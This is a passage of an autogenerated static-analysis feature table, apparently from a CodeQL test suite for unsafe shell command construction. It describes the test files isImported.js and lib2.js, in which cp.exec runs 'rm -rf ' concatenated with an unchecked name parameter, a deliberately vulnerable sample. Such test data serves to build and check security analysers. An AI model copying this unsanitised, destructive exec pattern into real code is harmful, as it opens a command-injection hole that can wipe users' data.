re ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:3:7:3:35 | cp = re ... ocess") | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:3:12:3:18 | require | contextFunctionInterfaces | thisMethodIsImported(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:3:12:3:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:3:12:3:18 | require | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:3:12:3:35 | exceptional return of require ... ocess") | contextFunctionInterfaces | thisMethodIsImported(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:3:12:3:35 | exceptional return of require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:3:12:3:35 | exceptional return of require ... ocess") | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:3:12:3:35 | require ... ocess") | contextFunctionInterfaces | thisMethodIsImported(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:3:12:3:35 | require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:3:12:3:35 | require ... ocess") | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:3:20:3:34 | "child_process" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:3:20:3:34 | "child_process" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:3:20:3:34 | "child_process" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:3:20:3:34 | "child_process" | contextFunctionInterfaces | thisMethodIsImported(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:3:20:3:34 | "child_process" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:3:20:3:34 | "child_process" | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:1:5:6 | module | contextFunctionInterfaces | thisMethodIsImported(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:1:5:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:1:5:6 | module | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:1:5:14 | module.exports | contextFunctionInterfaces | thisMethodIsImported(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:1:5:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:1:5:14 | module.exports | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:1:5:35 | module. ... mported | contextFunctionInterfaces | thisMethodIsImported(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:1:5:35 | module. ... mported | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:1:5:35 | module. ... mported | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:1:7:1 | module. ... OT OK\\n} | contextFunctionInterfaces | thisMethodIsImported(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:1:7:1 | module. ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:1:7:1 | module. ... OT OK\\n} | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:8:5:14 | exports | contextFunctionInterfaces | thisMethodIsImported(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:8:5:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:8:5:14 | exports | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:16:5:35 | thisMethodIsImported | contextFunctionInterfaces | thisMethodIsImported(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:16:5:35 | thisMethodIsImported | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:16:5:35 | thisMethodIsImported | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:39:5:38 | cp | contextFunctionInterfaces | thisMethodIsImported(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:39:5:38 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:39:5:38 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:39:5:38 | cp | enclosingFunctionName | thisMethodIsImported | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:39:5:38 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:39:5:38 | this | contextFunctionInterfaces | thisMethodIsImported(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:39:5:38 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:39:5:38 | this | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:39:5:38 | this | enclosingFunctionName | thisMethodIsImported | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:39:5:38 | this | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:39:7:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | thisMethodIsImported(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:39:7:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:39:7:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:39:7:1 | 'arguments' object of anonymous function | enclosingFunctionName | thisMethodIsImported | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:39:7:1 | 'arguments' object of anonymous function | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:39:7:1 | exceptional return of anonymous function | contextFunctionInterfaces | thisMethodIsImported(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:39:7:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:39:7:1 | exceptional return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:39:7:1 | exceptional return of anonymous function | enclosingFunctionName | thisMethodIsImported | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:39:7:1 | exceptional return of anonymous function | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:39:7:1 | functio ... OT OK\\n} | assignedToPropName | thisMethodIsImported | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:39:7:1 | functio ... OT OK\\n} | contextFunctionInterfaces | thisMethodIsImported(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:39:7:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:39:7:1 | functio ... OT OK\\n} | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:39:7:1 | return of anonymous function | contextFunctionInterfaces | thisMethodIsImported(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:39:7:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:39:7:1 | return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:39:7:1 | return of anonymous function | enclosingFunctionName | thisMethodIsImported | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:39:7:1 | return of anonymous function | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:49:5:52 | name | contextFunctionInterfaces | thisMethodIsImported(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:49:5:52 | name | contextFunctionInterfaces | thisMethodIsImported(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:49:5:52 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:49:5:52 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:49:5:52 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:49:5:52 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:49:5:52 | name | enclosingFunctionName | thisMethodIsImported | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:49:5:52 | name | enclosingFunctionName | thisMethodIsImported | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:49:5:52 | name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:5:49:5:52 | name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:2:6:3 | cp | contextFunctionInterfaces | thisMethodIsImported(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:2:6:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:2:6:3 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:2:6:3 | cp | enclosingFunctionName | thisMethodIsImported | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:2:6:3 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:2:6:8 | cp.exec | contextFunctionInterfaces | thisMethodIsImported(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:2:6:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:2:6:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:2:6:8 | cp.exec | enclosingFunctionName | thisMethodIsImported | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:2:6:8 | cp.exec | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:2:6:26 | cp.exec ... + name) | contextFunctionInterfaces | thisMethodIsImported(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:2:6:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:2:6:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:2:6:26 | cp.exec ... + name) | enclosingFunctionName | thisMethodIsImported | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:2:6:26 | cp.exec ... + name) | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:2:6:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | thisMethodIsImported(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:2:6:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:2:6:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:2:6:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | thisMethodIsImported | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:2:6:26 | exceptional return of cp.exec ... + name) | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:5:6:8 | exec | contextFunctionInterfaces | thisMethodIsImported(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:5:6:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:5:6:8 | exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:5:6:8 | exec | enclosingFunctionName | thisMethodIsImported | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:5:6:8 | exec | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:10:6:18 | "rm -rf " | contextFunctionInterfaces | thisMethodIsImported(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:10:6:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:10:6:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:10:6:18 | "rm -rf " | enclosingFunctionName | thisMethodIsImported | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:10:6:18 | "rm -rf " | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:10:6:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:10:6:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:10:6:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:10:6:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:10:6:25 | "rm -rf " + name | contextFunctionInterfaces | thisMethodIsImported(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:10:6:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:10:6:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:10:6:25 | "rm -rf " + name | enclosingFunctionName | thisMethodIsImported | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:10:6:25 | "rm -rf " + name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:10:6:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:22:6:25 | name | contextFunctionInterfaces | thisMethodIsImported(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:22:6:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:22:6:25 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:22:6:25 | name | enclosingFunctionName | thisMethodIsImported | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:22:6:25 | name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/isImported.js:6:22:6:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:1:1:0 | this | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:1:1:0 | this | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:1:1:1 | cp | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:1:1:1 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:1:1:1 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:1:1:1 | module | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:1:1:1 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:1:1:1 | module | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:1:1:1 | require | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:1:1:1 | require | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:5:1:6 | cp | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:5:1:6 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:5:1:6 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:5:1:6 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:5:1:33 | cp | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:5:1:33 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:5:1:33 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:5:1:33 | cp = re ... ocess") | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:5:1:33 | cp = re ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:5:1:33 | cp = re ... ocess") | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:10:1:16 | require | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:10:1:16 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:10:1:16 | require | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:10:1:33 | exceptional return of require ... ocess") | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:10:1:33 | exceptional return of require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:10:1:33 | exceptional return of require ... ocess") | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:10:1:33 | require ... ocess") | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:10:1:33 | require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:10:1:33 | require ... ocess") | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:18:1:32 | "child_process" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:18:1:32 | "child_process" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:18:1:32 | "child_process" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:18:1:32 | "child_process" | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:18:1:32 | "child_process" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:1:18:1:32 | "child_process" | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:1:3:6 | module | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:1:3:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:1:3:6 | module | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:1:3:14 | module.exports | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:1:3:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:1:3:14 | module.exports | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:1:5:1 | module. ... dule.\\n} | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:1:5:1 | module. ... dule.\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:1:5:1 | module. ... dule.\\n} | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:8:3:14 | exports | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:8:3:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:8:3:14 | exports | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:18:3:17 | cp | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:18:3:17 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:18:3:17 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:18:3:17 | cp | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:18:3:17 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:18:3:17 | this | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:18:3:17 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:18:3:17 | this | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:18:3:17 | this | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:18:3:17 | this | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:18:5:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | exports(name)\nfoo(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib2.js:3:18:5:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| 